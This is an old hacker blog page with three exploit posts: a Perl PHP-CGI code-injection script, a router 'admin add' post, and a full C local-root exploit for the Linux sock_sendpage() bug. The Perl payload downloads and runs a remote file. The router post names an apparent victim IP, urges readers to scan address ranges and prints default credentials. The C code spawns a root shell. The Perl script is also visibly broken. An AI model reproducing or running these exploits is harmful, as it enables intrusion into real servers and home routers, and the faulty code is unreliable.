Help pay for xds lawyer fees.
LR

[Exploit]: PHP CGI exec-cmd/injection of php-code thru phptags by (xd) PERL CODE

Posted on 6th May 2012 in Codes, Exploits, Papers, Uncategorized

Done this, but, this is only a basic version wich, i guess does things in a nice way :)

it is my 3rd perl exploit , so pls dont bash me, any fixes etc would be appreciated BUT remember it is using the RIGHT method, ie: injecting php by shellexec()

wich IS a PHP CGI function, and the ONLY way it Will definately exec!

Ok now on with the show….


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage:\n";
print "$0 <Host> <Cmd [Ex: id]>\n";
exit(-1);
}
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

 

Enjoy / xd–

comments: 0 » tags: , , , , , , , , ,

PoC : WindWeb/2.0 Server admin add exploit , carnage for ANY .kr/.tw ! Kep pvt for 5yrs… being leaked well, we owned them now, you can try reown them :P~

Posted on 1st May 2012 in Android, Codes, Exploits, Papers, Uncategorized

ill make it short and sweet, but, i can tell you NOW, this is useable across MANY routers, and yes, it DOES matter on some routers if they enable or disable ports 80/443 ,inwich netgear, and obviously this brand , doesnt :P

Here we go… to add an admin or just overwrite one: Info details for exploit / jmp point and server error for gdb … have fun!


like , you will need to find your OWn index.html , as this MUSt be simply, changed, so, when you find, an exmaple would be to scan 220.76.* range.. then, learn some about routers, find a WindWeb, then it should be in
theyre admin page BUT this is accessed remotely... and, locally then after you change the pass ... i doubt many opers even change router passes once set....so you make abs no logs really... nothing shows to them unless it is some hi duty server :s
so yes, it can very VERY nice... but im not going to handout a *how to* on finding them... simple. find em yaself!
220.76.166.73:80 / was this box btw... so, as you see, 220 , is obv an adsl range and yea, what stupid ass server, runs a router ad ion port 80 ? THIS ONE! bahha

Did we contact them, umm no, did they pay us to do any work for them...so no.

///////////////////PoC By xd and dd0k/anemic
Server: WindWeb/2.0  Connection: close  Content-Type: text/html
Web Server Error Report:
Server Error: 501 Not Implemented
Operating System Error Nr:3997697:
errno = 0x3d0001

///Notes: .korean HOME routers/BIZ routers ALL affected - noted: 4mb and fast on the adsl alone.. not bad for HOME! 4meg/s!

<content="text/html; charset=euc-kr">
<SCRIPT LANGUAGE="JavaScript">
var st_lan_ip = new Array(4)
var st_lan_subnet = new Array(4)
var st_lan_mac = new Array(4)
st_lan_ip[0] = "192.168.1.1"
st_lan_subnet[0] = "255.255.255.0"
st_lan_mac[0] = "00:05:C6:3A:1A:45"
var st_lan_active = "1"
<!--
var id = new Array();
id[0]="adsl"
id[1]="user"

var pass = new Array();
pass[0]="megapass"
pass[1]="megapass"

// will make login on the localhost/ user:adsl pass:megapass
comments: 0 » tags: , , , , , , , , , ,

[OLD-UPDATED]: Linux sock_sendpage() NULL pointer deref x86_64/x86/x64/PPC and PPC64 (MMAP redone v2)+READ About using vmap()

Posted on 24th November 2011 in Codes, Exploits

Yea yea.. it is OLD!
Just notice, that playin abit with mmap vals,will get you root still..but,be creative ;) hint is given in-code..
Now the oladass c0de :P (Note the sendfile is done without using mmap/null ;)

FROM SOMEONE WHO WANTED TO KNOW WHY… So i have tried to explain things here,without editing the code,coz, that wont do… anyhow, i hope this explains a few things about mmap and vm,ap to those who dfo not yet get this sh1t.

i have checked 3 host ,not work to me, :
Linux xx.com 2.6.18-274.12.1.el5.centos.plus #1 SMP Tue Nov 29 18:16:47 EST 2011 x86_64 x86_64 x86_64 GNU/Linux
t.c: In function ‘main’:
t.c:147: warning: passing argument 1 of ‘mmap’ makes pointer from integer without a cast

-> failed to mmap: Invalid argument

UPDATE: NOW only updated it because of a non working centos x86_64 ,so lets fix that back ok…this is easy….
We only did mess with PAGE_SIZE of mmap() right?
so first we do this,

// #define PAGE_SIZE getpagesize()  // PAGE_SIZE only need this if the kernel doesnt have header,so maybe // out to

so it wont use the internal mmap,wich, it would not matter anyhow, the exploit should STILL work, but anyhow there is 2 ways to address this last mmap bit…and thats to addin a static figure , some boxes, are mmap(4096,NULL().. ,whilst some, MUST be NULL,so, you might want to try using the NULL version of the exploit…wich can be found on many repos, and it is also disguised as sendpage 2010 or 2010 , i believe, i released that version compiled even, smwhere,working fine, heck, works for me, never really wtached for whatkernels but, i must admit, i had NOT tried this on a centos of late, but, we all know, this type of mmap() bug, well, most boxes block mmap() use ATALL in userland…those who dont will have some grsec or just, preventitive techniques wich make mapping it to NULL almost impossible… heck, if you want to offer another vector for this, like, i have considered to use vmap() wich someone from my channel did do and demonstrated that works,but also we have another mmap size(my bad i forgot this one, and it might actually work for centos) thats simply mmap(4096 * 2,NULL.. , same as rest of it… this is all you could to maybe with mmap,max values i think* but, on vmap, you only have i believe that value and NULL also yes, but, i have yet to try convert anything to use vmap, as it still sits where mmap() is in kernel world…wich is a very tough secure place..but, then again, as i said, i dont think this method, vmap() addr, has been used atall yet…and, could have been,. and, would probably A. not trigger ANYTHING the admins have set to kill any mmap(0 and even B. Bypass the grsec ACL, this is NOT the grsec kernel, the ACL… and maybe C. Bypass,or, just get to map the page, because the kernel sees what is usually, a very normal thing :s…so, yea, hell… good pint out to me in the comment, but, please, learn to use mmap() abit then ask me things like this :S lol..take care.
XD

/*
 *  Linux PF_UNIX or PF_BLUETOOTH sock_sendpage() NULL pointer deref x86_64/x86/x64/PPC and PPC64
 *  ****PF_UNIX socket-vector
 *
 * Exploit was tested on:
 * CentOS 5.7 (2.6.18-274.el5)
 * Red Hat Enterprise Linux 5.7 (2.6.18-274.6.1.el5)
 * SUSE Linux Enterprise Server 11 (2.6.27.19-5)
 * Ubuntu 11.10 (Latest 2011) - Mixed results,depends on the version of kernel.. 2.6.32.6 seems abit better
 *
 * For i386 and PPC i386, compile with the following command:
 * gcc -Wall -o sendpage sendpage.c
 * And for x86_64 and PPC64:
 * gcc -Wall -m64 -o sendpage sendpage.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/utsname.h>
#include <unistd.h>

#define PAGE_SIZE getpagesize()  // PAGE_SIZE only need this if the kernel doesnt have header,so maybe // out to

//#ifndef PF_UNIX
//#define PF_UNIX AF_UNIX
//#define AF_UNIX 11             // Adjust this... some boxes will want this IN
//#endif

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
	unsigned long sp;
	asm volatile ("movq %%rsp,%0; " : "=r" (sp));
	return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
	unsigned long sp;
	asm volatile ("movl %%esp,%0" : "=r" (sp));
	return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
	unsigned long sp;
	asm volatile ("mr %0,%%r1; " : "=r" (sp));
	return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
	unsigned long task_struct;
	asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
	return task_struct;
}
#else
static __always_inline unsigned long current_task_struct(void) {
	unsigned long task_struct, thread_info;
	thread_info = current_stack_pointer() & ~(4096 - 1);
	if (*(unsigned long *)thread_info >= 0xc0000000) {
	task_struct = *(unsigned long *)thread_info;
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	}
	task_struct = current_stack_pointer() & ~(8192 - 1);
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	thread_info = task_struct;
	task_struct = *(unsigned long *)thread_info;
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_task_struct(void) {
	unsigned long task_struct, thread_info;
#if defined(__LP64__)
	task_struct = current_stack_pointer() & ~(16384 - 1);
#else
	task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	thread_info = task_struct;
	task_struct = *(unsigned long *)thread_info;
	if (*(unsigned long *)task_struct == 0)
	return task_struct;
	return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
	unsigned int *task_struct;
	task_struct = (unsigned int *)current_task_struct();
	while (task_struct) {
	if (task_struct[0] == uid && task_struct[1] == uid &&
	task_struct[2] == uid && task_struct[3] == uid &&
	task_struct[4] == gid && task_struct[5] == gid &&
	task_struct[6] == gid && task_struct[7] == gid) {
	task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] =task_struct[4] = task_struct[5] =
	task_struct[6] = task_struct[7] = 0;
	break;
	}
	task_struct++;
	}
	return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
	unsigned int *task_struct;
	task_struct = (unsigned int *)current_task_struct();
	while (task_struct) {
	if (!task_struct[0]) {
	task_struct++;
	continue;
	}
	if(task_struct[0]==task_struct[1]&&task_struct[0]==task_struct[2]&&
	task_struct[0]==task_struct[3]&&task_struct[4]==task_struct[5]&&
	task_struct[4]==task_struct[6]&&task_struct[4]==task_struct[7]) {
        task_struct[0]=task_struct[1]=task_struct[2]=task_struct[3]=task_struct[4]=
        task_struct[5]=task_struct[6]=task_struct[7]=0;
	break;
	}
	task_struct++;
	}
	return -1;
}
#endif

int main(void) {
	char *addr;
	int out_fd, in_fd;
	char template[] = "/tmp/fdlist.SUX";
#if defined(__i386__) || defined(__x86_64__)
	uid = getuid(), gid = getgid();
#endif
        if((addr=mmap(PAGE_SIZE,NULL,PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED){
	perror("-> failed to mmap");
	exit(EXIT_FAILURE);
	}
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
	addr[0] = '\xff';
	addr[1] = '\x24';
	addr[2] = '\x25';
	*(unsigned long *)&addr[3] = 8;
	*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
	addr[0] = '\xff';
	addr[1] = '\x25';
	*(unsigned long *)&addr[2] = 8;
	*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
	*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
	addr[0] = '\x3f';
	addr[1] = '\xe0';
	*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
	addr[4] = '\x63';
	addr[5] = '\xff';
	*(unsigned short *)&addr[6] = (unsigned short)change_cred;
	addr[8] = '\x7f';
	addr[9] = '\xe9';
	addr[10] = '\x03';
	addr[11] = '\xa6';
	addr[12] = '\x4e';
	addr[13] = '\x80';
	addr[14] = '\x04';
	addr[15] = '\x20';
#endif
#endif
	if ((out_fd = socket(PF_UNIX, SOCK_DGRAM, 0)) == -1) {
	perror("-> socket");
	exit(EXIT_FAILURE);
	}
	if ((in_fd = mkstemp(template)) == -1) {
	perror("-> mkstemp");
	exit(EXIT_FAILURE);
	}
	if(unlink(template) == -1) {
	perror("-> unlink");
	exit(EXIT_FAILURE);
	}
	if (ftruncate(in_fd, PAGE_SIZE) == -1) {
	perror("-> ftruncate");
	exit(EXIT_FAILURE);
	}
	sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
	execl("/bin/sh", "/bin/sh", "-i", NULL);
	exit(EXIT_SUCCESS);
}

Yea yea, it is modified alittle, to gain a rootshell 100% with OUT using PER_SVR/mmap_min_addr,altho that would
do for PPC and PPC64 ,payloads are done accordingly,compile it RIGHT!
xd– / #HaxNET && #HaxSHELLS !

NEED A **GOOD** VPS :
http://www.vr.org/aff.php?aff=551 – VPS 5bux ,then 10bux monthly
Gives ya IPv6 \64 and native + allows Tunnelbroker to, for having 3 tunnels IPV6,IPV4 and all BW is GENEROUS!

Please use the reflink,it WILL make YOUR stuff cheaper,you will see why when i show you ;)
If your an aff,but there is already atleast ONE who uses it and,LOVES it like me who now have 2 boxes thru
one panel,running one UK and one AMS/NL !
Lovin it!

comments: 0 » tags: